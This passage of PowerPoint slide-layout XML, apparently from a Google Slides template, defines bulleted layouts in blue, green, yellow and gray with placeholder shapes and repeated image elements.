        <p:cNvPr id="1" name="Shape 849"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="850" name="Google Shape;850;p54"/>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54"/>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2" name="Google Shape;852;p54"/>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53" name="Google Shape;853;p54"/>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54" name="Google Shape;854;p54"/>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55" name="Google Shape;855;p54"/>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56" name="Google Shape;856;p54"/>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7" name="Google Shape;857;p54"/>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58" name="Google Shape;858;p54"/>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54"/>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0" name="Google Shape;860;p54"/>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54"/>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2" name="Google Shape;862;p54"/>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54"/>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4" name="Google Shape;864;p54"/>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54"/>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6" name="Google Shape;866;p54"/>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54"/>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68" name="Google Shape;868;p54"/>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54"/>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870" name="Google Shape;870;p54"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2552" b="2561"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1171588"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="871" name="Google Shape;871;p54"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2552" b="2561"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1709650"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="872" name="Google Shape;872;p54"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2552" b="2561"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2205600"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="873" name="Google Shape;873;p54"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2552" b="2561"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2755163"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="874" name="Google Shape;874;p54"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2552" b="2561"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3277788"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="875" name="Google Shape;875;p54"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2883" b="2892"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3794760"/>
            <a:ext cx="520980" cy="393192"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="876" name="Google Shape;876;p54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="4343400"/>
            <a:ext cx="520980" cy="393192"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>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42. Bullets 1–7 (Blue)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_2_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 877"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="878" name="Google Shape;878;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1045025" y="11616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55"/>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0" name="Google Shape;880;p55"/>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881" name="Google Shape;881;p55"/>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882" name="Google Shape;882;p5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883" name="Google Shape;883;p55"/>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884" name="Google Shape;884;p55"/>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5" name="Google Shape;885;p55"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="11753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6" name="Google Shape;886;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1045200" y="16842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55"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="250" y="1697950"/>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88" name="Google Shape;888;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1045075" y="220740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55"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="222110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0" name="Google Shape;890;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1045075" y="27300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55"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-250" y="27437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2" name="Google Shape;892;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1045100" y="3252650"/>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55"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3266350"/>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4" name="Google Shape;894;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1045100" y="377527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55"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-50" y="3788975"/>
            <a:ext cx="9144000" cy="4572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6" name="Google Shape;896;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1045100" y="4323425"/>
            <a:ext cx="7849500" cy="4464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55"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="9"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25" y="4337125"/>
            <a:ext cx="9144000" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="13258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898" name="Google Shape;898;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1171588"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="899" name="Google Shape;899;p55"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1709650"/>
            <a:ext cx="521208" cy="396119"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="900" name="Google Shape;900;p55"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2205600"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="901" name="Google Shape;901;p55"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2755163"/>
            <a:ext cx="521208" cy="396119"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="902" name="Google Shape;902;p55"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3277788"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="903" name="Google Shape;903;p55"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1616" b="1616"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3794760"/>
            <a:ext cx="520980" cy="393192"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="904" name="Google Shape;904;p55"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1616" b="1616"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="4343400"/>
            <a:ext cx="520980" cy="393192"/>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43. Bullets 1–8 (Green)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 905"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="906" name="Google Shape;906;p56"/>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07" name="Google Shape;907;p56"/>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08" name="Google Shape;908;p56"/>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09" name="Google Shape;909;p56"/>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10" name="Google Shape;910;p56"/>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11" name="Google Shape;911;p56"/>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2" name="Google Shape;912;p56"/>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56"/>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4" name="Google Shape;914;p56"/>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56"/>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6" name="Google Shape;916;p56"/>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56"/>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18" name="Google Shape;918;p56"/>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56"/>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0" name="Google Shape;920;p56"/>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56"/>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2" name="Google Shape;922;p56"/>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56"/>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4" name="Google Shape;924;p56"/>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56"/>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26" name="Google Shape;926;p56"/>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56"/>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28" name="Google Shape;928;p56"/>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29" name="Google Shape;929;p56"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1047" b="1037"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1709928"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="930" name="Google Shape;930;p56"/>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31" name="Google Shape;931;p56"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1047" b="1037"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2577303"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="932" name="Google Shape;932;p56"/>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33" name="Google Shape;933;p56"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1047" b="1037"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3438144"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="934" name="Google Shape;934;p56"/>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35" name="Google Shape;935;p56"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1047" b="1037"/>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44. Bullets 1–8 (Yellow/Green)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_1_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 936"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="937" name="Google Shape;937;p57"/>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38" name="Google Shape;938;p57"/>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39" name="Google Shape;939;p57"/>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40" name="Google Shape;940;p57"/>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41" name="Google Shape;941;p57"/>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42" name="Google Shape;942;p57"/>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3" name="Google Shape;943;p57"/>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57"/>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5" name="Google Shape;945;p57"/>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57"/>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7" name="Google Shape;947;p57"/>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57"/>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49" name="Google Shape;949;p57"/>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57"/>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1" name="Google Shape;951;p57"/>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57"/>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3" name="Google Shape;953;p57"/>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57"/>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5" name="Google Shape;955;p57"/>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57"/>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57" name="Google Shape;957;p57"/>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57"/>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59" name="Google Shape;959;p57"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1261872"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="960" name="Google Shape;960;p57"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1709928"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="961" name="Google Shape;961;p57"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2129247"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="962" name="Google Shape;962;p57"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2577303"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="963" name="Google Shape;963;p57"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2999232"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="964" name="Google Shape;964;p57"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3438144"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="965" name="Google Shape;965;p57"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3877056"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="966" name="Google Shape;966;p57"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>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45. Bullets 1–8 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_1_1_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 967"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="968" name="Google Shape;968;p58"/>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69" name="Google Shape;969;p58"/>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970" name="Google Shape;970;p58"/>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971" name="Google Shape;971;p58"/>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972" name="Google Shape;972;p58"/>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973" name="Google Shape;973;p58"/>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4" name="Google Shape;974;p58"/>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58"/>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6" name="Google Shape;976;p58"/>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58"/>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78" name="Google Shape;978;p58"/>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58"/>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0" name="Google Shape;980;p58"/>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58"/>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2" name="Google Shape;982;p58"/>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58"/>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4" name="Google Shape;984;p58"/>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58"/>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6" name="Google Shape;986;p58"/>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58"/>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988" name="Google Shape;988;p58"/>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58"/>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990" name="Google Shape;990;p58"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2552" b="2561"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1261872"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="991" name="Google Shape;991;p58"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2552" b="2561"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1709928"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="992" name="Google Shape;992;p58"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2552" b="2561"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2129247"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="993" name="Google Shape;993;p58"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2552" b="2561"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2577303"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="994" name="Google Shape;994;p58"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2552" b="2561"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2999232"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="995" name="Google Shape;995;p58"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2552" b="2561"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3438144"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
